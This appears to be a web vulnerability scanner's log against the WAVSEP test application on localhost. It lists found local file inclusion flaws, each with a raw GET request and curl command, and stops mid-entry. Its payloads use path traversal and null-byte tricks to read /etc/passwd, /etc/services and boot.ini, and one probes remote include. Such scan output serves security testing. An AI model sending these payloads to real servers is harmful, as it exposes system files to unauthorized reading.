GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
